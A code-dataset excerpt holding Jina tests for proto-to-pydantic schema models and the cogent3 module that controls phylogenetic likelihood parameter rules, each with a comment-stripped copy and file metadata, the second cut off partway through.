doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc')
assert doc.text == 'abc'
assert 'blob' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_buffer():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(buffer=b'abc')
assert doc.buffer == b'abc'
assert 'text' not in doc.dict()
assert 'blob' not in doc.dict()
def test_oneof_blob():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert doc.blob == PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
assert 'text' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_validation_error():
"""This tests validation error for invalid fields"""
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc', buffer=b'abc')
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
text='abc', buffer=b'abc', blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
def test_tags_document():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world')
assert doc.tags == {'hello': 'world'}
assert Document(doc.dict()).tags == {'hello': 'world'}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': 'value'})
assert doc.tags == {'hello': 'world', 'key': 'value'}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': 'value',
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
hello='world', tags={'key': {'nested': 'value'}}
)
assert doc.tags == {'hello': 'world', 'key': {'nested': 'value'}}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': {'nested': 'value'},
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': [1, 2, 3]})
# TODO: Issue about having proper ListValueView, not really expected
assert doc.tags != {'key': [1, 2, 3]}
with pytest.raises(TypeError):
assert Document(doc.dict()).tags != {{'key': [1, 2, 3]}}
def test_repeated():
"""This tests: repeated fields are represented as `array`"""
assert (
PROTO_TO_PYDANTIC_MODELS.DenseNdArrayProto().schema()['properties']['shape'][
'type'
]
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['type']
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['chunks']['type']
== 'array'
)
def test_recursive_schema():
"""This tests: recursive schmea definions are represented properly"""
assert PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['items'] == {'$ref': '#/definitions/NamedScoreProto'}
def test_struct():
"""This tests: google.protobuf.Struct are represented as `object`"""
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['tags']['type']
== 'object'
)
def test_timestamp():
"""This tests: google.protobuf.Timestamp are represented as date-time"""
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['type']
== 'string'
)
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['format']
== 'date-time'
)
def test_jina_document_to_pydantic_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['dense']['shape']
== pydantic_doc.embedding.dense.shape
)
assert (
jina_doc['embedding']['dense']['dtype']
== pydantic_doc.embedding.dense.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_jina_document_to_pydantic_document_sparse():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10, sparse_embedding=True):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['sparse']['indices']['buffer']
== pydantic_doc.embedding.sparse.indices.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['indices']['shape']
== pydantic_doc.embedding.sparse.indices.shape
)
assert (
jina_doc['embedding']['sparse']['indices']['dtype']
== pydantic_doc.embedding.sparse.indices.dtype
)
assert (
jina_doc['embedding']['sparse']['values']['buffer']
== pydantic_doc.embedding.sparse.values.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['values']['shape']
== pydantic_doc.embedding.sparse.values.shape
)
assert (
jina_doc['embedding']['sparse']['values']['dtype']
== pydantic_doc.embedding.sparse.values.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_pydatic_document_to_jina_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
jina_doc = Document(document_proto_model(text='abc').json())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
jina_doc = Document(document_proto_model(text='abc').dict())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
@pytest.mark.parametrize('top_k', [5, 10])
def test_model_with_top_k(top_k):
m = JinaRequestModel(data=['abc'], parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
m = JinaRequestModel(parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
| 33.558824
| 88
| 0.637258
|
import pydantic
import pytest
from jina.peapods.runtimes.gateway.http.models import (
PROTO_TO_PYDANTIC_MODELS,
JinaRequestModel,
)
from jina.types.document import Document
from tests import random_docs
def test_schema_invocation():
for v in vars(PROTO_TO_PYDANTIC_MODELS).values():
v.schema()
v.schema_json()
def test_existing_definitions():
for i in [
'QuantizationMode',
'DenseNdArrayProto',
'SparseNdArrayProto',
'NdArrayProto',
'NamedScoreProto',
'DocumentProto',
]:
assert (
i in PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'].keys()
)
def test_enum_definitions():
quantization_enum_definition = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['QuantizationMode']
assert quantization_enum_definition['enum'] == [0, 1, 2, 3]
status_code_enum_definition = PROTO_TO_PYDANTIC_MODELS.StatusProto().schema()[
'definitions'
]['StatusCode']
assert status_code_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
command_enum_definition = PROTO_TO_PYDANTIC_MODELS.RequestProto().schema()[
'definitions'
]['Command']
assert command_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
def test_all_fields_in_document_proto():
document_proto_properties = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema(
by_alias=False
)['definitions']['DocumentProto']['properties']
for i in [
'id',
'granularity',
'adjacency',
'parent_id',
'chunks',
'weight',
'matches',
'mime_type',
'uri',
'tags',
'location',
'offset',
'embedding',
'scores',
'modality',
'evaluations',
]:
assert i in document_proto_properties
document_proto_properties_alias = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['DocumentProto']['properties']
for i in ['parentId', 'mimeType']:
assert i in document_proto_properties_alias
def test_oneof_text():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc')
assert doc.text == 'abc'
assert 'blob' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_buffer():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(buffer=b'abc')
assert doc.buffer == b'abc'
assert 'text' not in doc.dict()
assert 'blob' not in doc.dict()
def test_oneof_blob():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert doc.blob == PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
assert 'text' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_validation_error():
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc', buffer=b'abc')
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
text='abc', buffer=b'abc', blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
def test_tags_document():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world')
assert doc.tags == {'hello': 'world'}
assert Document(doc.dict()).tags == {'hello': 'world'}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': 'value'})
assert doc.tags == {'hello': 'world', 'key': 'value'}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': 'value',
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
hello='world', tags={'key': {'nested': 'value'}}
)
assert doc.tags == {'hello': 'world', 'key': {'nested': 'value'}}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': {'nested': 'value'},
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': [1, 2, 3]})
assert doc.tags != {'key': [1, 2, 3]}
with pytest.raises(TypeError):
assert Document(doc.dict()).tags != {{'key': [1, 2, 3]}}
def test_repeated():
assert (
PROTO_TO_PYDANTIC_MODELS.DenseNdArrayProto().schema()['properties']['shape'][
'type'
]
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['type']
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['chunks']['type']
== 'array'
)
def test_recursive_schema():
assert PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['items'] == {'$ref': '#/definitions/NamedScoreProto'}
def test_struct():
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['tags']['type']
== 'object'
)
def test_timestamp():
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['type']
== 'string'
)
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['format']
== 'date-time'
)
def test_jina_document_to_pydantic_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['dense']['shape']
== pydantic_doc.embedding.dense.shape
)
assert (
jina_doc['embedding']['dense']['dtype']
== pydantic_doc.embedding.dense.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_jina_document_to_pydantic_document_sparse():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10, sparse_embedding=True):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['sparse']['indices']['buffer']
== pydantic_doc.embedding.sparse.indices.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['indices']['shape']
== pydantic_doc.embedding.sparse.indices.shape
)
assert (
jina_doc['embedding']['sparse']['indices']['dtype']
== pydantic_doc.embedding.sparse.indices.dtype
)
assert (
jina_doc['embedding']['sparse']['values']['buffer']
== pydantic_doc.embedding.sparse.values.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['values']['shape']
== pydantic_doc.embedding.sparse.values.shape
)
assert (
jina_doc['embedding']['sparse']['values']['dtype']
== pydantic_doc.embedding.sparse.values.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_pydatic_document_to_jina_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
jina_doc = Document(document_proto_model(text='abc').json())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
jina_doc = Document(document_proto_model(text='abc').dict())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
@pytest.mark.parametrize('top_k', [5, 10])
def test_model_with_top_k(top_k):
m = JinaRequestModel(data=['abc'], parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
m = JinaRequestModel(parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
| true
| true
|
f707c234f80c2a7b484c963a5e239100d01184f1
| 20,460
|
py
|
Python
|
src/cogent3/evolve/parameter_controller.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
src/cogent3/evolve/parameter_controller.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
src/cogent3/evolve/parameter_controller.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""
This file defines a class for controlling the scope and heterogeneity of
parameters involved in a maximum-likelihood based tree analysis.
"""
import pickle
import warnings
import numpy
from cogent3.align import dp_calculation
from cogent3.align.pairwise import AlignableSeq
from cogent3.core.tree import TreeError
from cogent3.evolve import likelihood_calculation
from cogent3.evolve.likelihood_function import LikelihoodFunction as _LF
from cogent3.maths.stats.information_criteria import aic, bic
from cogent3.recalculation.scope import _indexed
from cogent3.util.misc import adjusted_gt_minprob
from cogent3.util.warning import deprecated, discontinued
__author__ = "Peter Maxwell"
__copyright__ = "Copyright 2007-2019, The Cogent Project"
__credits__ = ["Andrew Butterfield", "Peter Maxwell", "Gavin Huttley", "Helen Lindsay"]
__license__ = "BSD-3"
__version__ = "2019.9.13a"
__maintainer__ = "Gavin Huttley"
__email__ = "gavin.huttley@anu.ed.au"
__status__ = "Production"
def _category_names(dimension, specified):
if type(specified) is int:
cats = ["%s%s" % (dimension, i) for i in range(specified)]
else:
cats = tuple(specified)
assert len(cats) >= 1, cats
assert len(set(cats)) == len(cats), "%s names must be unique" % dimension
return list(cats)
def load(filename):
# first cut at saving pc's
f = open(filename, "rb")
(version, info, pc) = pickle.load(f)
assert version < 2.0, version
pc.update_intermediate_values()
return pc
class _LikelihoodParameterController(_LF):
"""A ParameterController works by setting parameter rules. For each
parameter in the model the edges of the tree are be partitioned into groups
that share one value.
For usage see the set_param_rule method.
"""
# Basically wrapper around the more generic recalulation.ParameterController
# class, which doesn't know about trees.
def __init__(
self,
model,
tree,
bins=1,
loci=1,
optimise_motif_probs=False,
motif_probs_from_align=False,
**kw,
):
# cache of arguments used to construct
self._serialisable = locals()
for key in ("self", "__class__", "kw"):
self._serialisable.pop(key)
self._serialisable.update(kw)
self.model = self._model = model
self.tree = self._tree = tree
self.seq_names = tree.get_tip_names()
self.locus_names = _category_names("locus", loci)
self.bin_names = _category_names("bin", bins)
self.posn_names = [str(i) for i in range(model.word_length)]
self.motifs = self._motifs = model.get_motifs()
self._mprob_motifs = list(model.get_mprob_alphabet())
defn = self.make_likelihood_defn(**kw)
super(_LF, self).__init__(defn)
self.set_default_param_rules()
self.set_default_tree_parameter_rules()
self.mprobs_from_alignment = motif_probs_from_align
self.optimise_motif_probs = optimise_motif_probs
self._name = ""
self._format = {}
def save(self, filename):
with open(filename, "w") as f:
temp = {}
try:
for d in self.defns:
temp[id(d)] = d.values
del d.values
pickle.dump((1.0, None, self), f)
finally:
for d in self.defns:
if id(d) in temp:
d.values = temp[id(d)]
def set_default_tree_parameter_rules(self):
"""Lengths are set to the values found in the tree (if any), and
free to be optimised independently.
Other parameters are scoped based on the unique values found in the
tree (if any) or default to having one value shared across the whole
tree"""
with self.updates_postponed():
edges = self.tree.get_edge_vector()
for par_name in self.model.get_param_list():
try:
values = dict(
[
(edge.name, edge.params[par_name])
for edge in edges
if not edge.isroot()
]
)
(uniq, index) = _indexed(values)
except KeyError:
continue # new parameter
for (u, value) in enumerate(uniq):
group = [edge for (edge, i) in list(index.items()) if i == u]
self.set_param_rule(par_name, edges=group, init=value)
for edge in edges:
if edge.length is not None:
try:
self.set_param_rule("length", edge=edge.name, init=edge.length)
except KeyError:
# hopefully due to being a discrete model
warnings.warn("Ignoring tree edge lengths", stacklevel=4)
break
def set_motif_probs_from_data(
self,
align,
locus=None,
is_constant=None,
include_ambiguity=False,
is_independent=None,
auto=False,
pseudocount=None,
**kwargs,
):
counts = self.model.count_motifs(align, include_ambiguity=include_ambiguity)
if is_constant is None:
is_constant = not self.optimise_motif_probs
if pseudocount is None:
if is_constant:
pseudocount = 0.0
else:
pseudocount = 0.5
counts += pseudocount
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(
mprobs,
locus=locus,
is_constant=is_constant,
is_independent=is_independent,
auto=auto,
**kwargs,
)
def set_motif_probs(
self,
motif_probs,
locus=None,
bin=None,
is_constant=None,
is_independent=None,
auto=False,
**kwargs,
):
motif_probs = self.model.adapt_motif_probs(motif_probs, auto=auto)
motif_probs = adjusted_gt_minprob(motif_probs, minprob=1e-6)
if is_constant is None:
is_constant = not self.optimise_motif_probs
self.model.set_param_controller_motif_probs(
self,
motif_probs,
is_constant=is_constant,
bin=bin,
locus=locus,
is_independent=is_independent,
**kwargs,
)
if not auto:
self.mprobs_from_alignment = False # should be done per-locus
def set_expm(self, expm):
assert expm in ["pade", "either", "eigen", "checked"], expm
self.set_param_rule("expm", is_constant=True, value=expm)
def make_calculator(self, **kw):
return super(_LF, self).make_calculator(**kw)
def _process_scope_info(
self,
edge=None,
tip_names=None,
edges=None,
clade=None,
stem=None,
outgroup_name=None,
):
"""From information specifying the scope of a parameter derive a list of
edge names"""
if edges is not None:
if tip_names or edge:
raise TreeError("Only ONE of edge, edges or tip_names")
elif edge is not None:
if tip_names:
raise TreeError("Only ONE of edge, edges or tip_names")
edges = [edge]
elif tip_names is None:
edges = None # meaning all edges
elif len(tip_names) != 2:
raise TreeError("tip_names must contain 2 species")
else:
(species1, species2) = tip_names
if stem is None:
stem = False
if clade is None:
clade = not stem
edges = self.tree.get_edge_names(
species1, species2, stem=stem, clade=clade, outgroup_name=outgroup_name
)
return edges
def apply_param_rules(self, rules):
"""batch applies a collection of param rules"""
with self.updates_postponed():
for rule in rules:
self.set_param_rule(**rule)
def set_time_heterogeneity(
self,
exclude_params=None,
edge_sets=None,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
):
"""modifes the scope of all submodel rate, aside from excluded params,
by constructing a list of parameter rules and using the
apply_param_rules method
Parameters
----------
exclude_params
name(s) of substitution model predicate(s) to be excluded
edge_sets
series of dicts with an 'edges' key. Can also specify
is_independent, is_contstant etc.. If those are not provided, the
method argument values are applied
is_independent : bool
whether edges in all edge sets are to be considered independent.
default is False
Overridden by edge_sets values.
is_constant : bool
makes constant all rate term parameters for all edge sets.
Overridden by edge_sets values.
value
value for constant parameters, only valid when is_constant.
Overridden by edge_sets values.
lower, init, upper
lower bound, starting value, upper bound for all parameters for
all edge sets. Only valid if not is_constant.
Overridden by edge_sets values.
"""
if is_constant and any([lower, init, upper]):
raise ValueError("cannot specify bounds or init for a constant param")
if is_constant:
kwargs = dict(is_constant=True, value=value)
else:
kwargs = dict(
is_independent=is_independent, init=init, lower=lower, upper=upper
)
rate_terms = self._model.get_param_list()
exclude_params = exclude_params or []
if exclude_params and type(exclude_params) == str:
exclude_params = [exclude_params]
for param in exclude_params:
if param not in rate_terms:
raise ValueError(f"'{param}' not a valid rate param")
rate_terms.remove(param)
if edge_sets is None:
# this just makes the following algorithm consistent
edge_sets = [
dict(edges=[n]) for n in self.tree.get_node_names(includeself=False)
]
elif type(edge_sets) == dict:
edge_sets = [edge_sets]
# we make param rules
param_rules = []
for edge_set in edge_sets:
edges = edge_set.get("edges", None)
if type(edges) == str:
edges = [edges]
if edges:
edges = list(edges)
edge_set["edges"] = edges
rule_base = kwargs.copy()
rule_base.update(edge_set)
for param in rate_terms:
rule = rule_base.copy()
rule.update(dict(par_name=param))
param_rules.append(rule)
self.apply_param_rules(param_rules)
def set_param_rule(
self,
par_name,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
**scope_info,
):
"""Define a model constraint for par_name. Parameters can be set
constant or split according to tree/bin scopes.
Parameters
----------
par_name
The model parameter being modified.
is_constant, value
if True, the parameter is held constant at
value, if provided, or the likelihood functions current value.
is_independent
whether the partition specified by scope/bin
arguments are to be considered independent.
lower, init, upper
specify the lower bound, initial value and
upper bound for optimisation. Can be set separately.
bin, bins
the name(s) of the bin to apply rule.
locus, loci
the name of the locus/loci to apply rule.
**scope_info
tree scope arguments
- edge, edges: The name of the tree edge(s) affected by rule.
- tip_names: a tuple of two tip names, specifying a tree scope
to apply rule.
- outgroup_name: A tip name that, provided along with tip_names,
ensures a consistently specified tree scope.
- clade: The rule applies to all edges descending from the most
recent common ancestor defined by the tip_names+outgroup_name
arguments.
- stem: The rule applies to the edge preceding the most recent
common ancestor defined by the tip_names+outgroup_name
arguments.
"""
par_name = str(par_name)
scopes = {}
for (single, plural) in [
("bin", "bins"),
("locus", "loci"),
("position", "positions"),
("motif", "motifs"),
]:
if single in scope_info:
v = scope_info.pop(single)
if v:
assert isinstance(v, str), "%s=, maybe?" % plural
assert plural not in scope_info
scopes[single] = [v]
elif plural in scope_info:
v = scope_info.pop(plural)
if v:
scopes[single] = v
edges = self._process_scope_info(**scope_info)
if edges:
scopes["edge"] = edges
if is_constant:
assert not (init or lower or upper)
elif init is not None:
assert not value
value = init
self.assign_all(
par_name, scopes, value, lower, upper, is_constant, is_independent
)
def set_local_clock(self, tip1name, tip2name):
"""Constrain branch lengths for tip1name and tip2name to be equal.
This is a molecular clock condition. Currently only valid for tips
connected to the same node.
Note: This is just a convenient interface to setParameterRule.
"""
self.set_param_rule(
"length", tip_names=[tip1name, tip2name], clade=True, is_independent=0
)
def set_constant_lengths(self, tree=None, exclude_list=None):
"""Constrains edge lengths to those in the tree.
Parameters
----------
tree
must have the same topology as the current model.
If not provided, the current tree length's are used.
exclude_list
a list of edge names whose branch lengths
will be constrained.
"""
exclude_list = exclude_list or []
if tree is None:
tree = self.tree
with self.updates_postponed():
for edge in tree.get_edge_vector():
if edge.length is None or edge.name in exclude_list:
continue
self.set_param_rule(
"length", edge=edge.name, is_constant=1, value=edge.length
)
def get_aic(self, second_order=False):
"""returns Aikake Information Criteria
Parameters
----------
second_order
if true, the second
adjusted by the alignment length
"""
if second_order:
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index)
for l in self.locus_names
)
else:
sequence_length = None
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return aic(lnL, nfp, sequence_length)
def get_bic(self):
"""returns the Bayesian Information Criteria"""
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index) for l in self.locus_names
)
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return bic(lnL, nfp, sequence_length)
class AlignmentLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
try:
self.assign_all("fixed_motif", None, value=-1, const=True, independent=True)
except KeyError:
pass
def make_likelihood_defn(self, sites_independent=True, discrete_edges=None):
defns = self.model.make_param_controller_defns(bin_names=self.bin_names)
if discrete_edges is not None:
from .discrete_markov import PartialyDiscretePsubsDefn
defns["psubs"] = PartialyDiscretePsubsDefn(
self.motifs, defns["psubs"], discrete_edges
)
return likelihood_calculation.make_total_loglikelihood_defn(
self.tree,
defns["align"],
defns["psubs"],
defns["word_probs"],
defns["bprobs"],
self.bin_names,
self.locus_names,
sites_independent,
)
def set_alignment(self, aligns, motif_pseudocount=None):
"""set the alignment to be used for computing the likelihood."""
if type(aligns) is not list:
aligns = [aligns]
assert len(aligns) == len(self.locus_names), len(aligns)
tip_names = set(self.tree.get_tip_names())
for index, aln in enumerate(aligns):
if len(aligns) > 1:
locus_name = "for locus '%s'" % self.locus_names[index]
else:
locus_name = ""
assert not set(aln.names).symmetric_difference(tip_names), (
"Tree tip names %s and aln seq names %s don't match %s"
% (self.tree.get_tip_names(), aln.names, locus_name)
)
assert "root" not in aln.names, "'root' is a reserved name."
with self.updates_postponed():
for (locus_name, align) in zip(self.locus_names, aligns):
self.assign_all(
"alignment", {"locus": [locus_name]}, value=align, const=True
)
if self.mprobs_from_alignment:
self.set_motif_probs_from_data(
align,
locus=locus_name,
auto=True,
pseudocount=motif_pseudocount,
)
class SequenceLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
pass
def make_likelihood_defn(
self, sites_independent=None, with_indel_params=True, kn=True
):
assert sites_independent is None or not sites_independent
assert len(self.locus_names) == 1
return dp_calculation.make_forward_tree_defn(
self.model,
self.tree,
self.bin_names,
with_indel_params=with_indel_params,
kn=kn,
)
def set_sequences(self, seqs, locus=None):
from cogent3.core.alignment import SequenceCollection
leaves = {}
if isinstance(seqs, SequenceCollection):
seqs = seqs.named_seqs
for (name, seq) in list(seqs.items()):
# if has uniq, probably already a likelihood tree leaf obj already
if hasattr(seq, "uniq"):
# XXX more checks - same alphabet as model, name etc ...
leaf = seq
else:
leaf = self.model.convert_sequence(seq, name)
leaf = AlignableSeq(leaf)
leaves[name] = leaf
assert name != "root", "'root' is a reserved name."
self.set_pogs(leaves, locus=locus)
def set_pogs(self, leaves, locus=None):
with self.updates_postponed():
for (name, pog) in list(leaves.items()):
self.set_param_rule("leaf", edge=name, value=pog, is_constant=True)
if self.mprobs_from_alignment:
counts = numpy.sum(
[pog.leaf.get_motif_counts() for pog in list(leaves.values())], 0
)
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(mprobs, locus=locus, is_constant=True, auto=True)
| 34.795918
| 88
| 0.575513
|
import pickle
import warnings
import numpy
from cogent3.align import dp_calculation
from cogent3.align.pairwise import AlignableSeq
from cogent3.core.tree import TreeError
from cogent3.evolve import likelihood_calculation
from cogent3.evolve.likelihood_function import LikelihoodFunction as _LF
from cogent3.maths.stats.information_criteria import aic, bic
from cogent3.recalculation.scope import _indexed
from cogent3.util.misc import adjusted_gt_minprob
from cogent3.util.warning import deprecated, discontinued
__author__ = "Peter Maxwell"
__copyright__ = "Copyright 2007-2019, The Cogent Project"
__credits__ = ["Andrew Butterfield", "Peter Maxwell", "Gavin Huttley", "Helen Lindsay"]
__license__ = "BSD-3"
__version__ = "2019.9.13a"
__maintainer__ = "Gavin Huttley"
__email__ = "gavin.huttley@anu.ed.au"
__status__ = "Production"
def _category_names(dimension, specified):
if type(specified) is int:
cats = ["%s%s" % (dimension, i) for i in range(specified)]
else:
cats = tuple(specified)
assert len(cats) >= 1, cats
assert len(set(cats)) == len(cats), "%s names must be unique" % dimension
return list(cats)
def load(filename):
f = open(filename, "rb")
(version, info, pc) = pickle.load(f)
assert version < 2.0, version
pc.update_intermediate_values()
return pc
class _LikelihoodParameterController(_LF):
# Basically wrapper around the more generic recalulation.ParameterController
# class, which doesn't know about trees.
def __init__(
self,
model,
tree,
bins=1,
loci=1,
optimise_motif_probs=False,
motif_probs_from_align=False,
**kw,
):
self._serialisable = locals()
for key in ("self", "__class__", "kw"):
self._serialisable.pop(key)
self._serialisable.update(kw)
self.model = self._model = model
self.tree = self._tree = tree
self.seq_names = tree.get_tip_names()
self.locus_names = _category_names("locus", loci)
self.bin_names = _category_names("bin", bins)
self.posn_names = [str(i) for i in range(model.word_length)]
self.motifs = self._motifs = model.get_motifs()
self._mprob_motifs = list(model.get_mprob_alphabet())
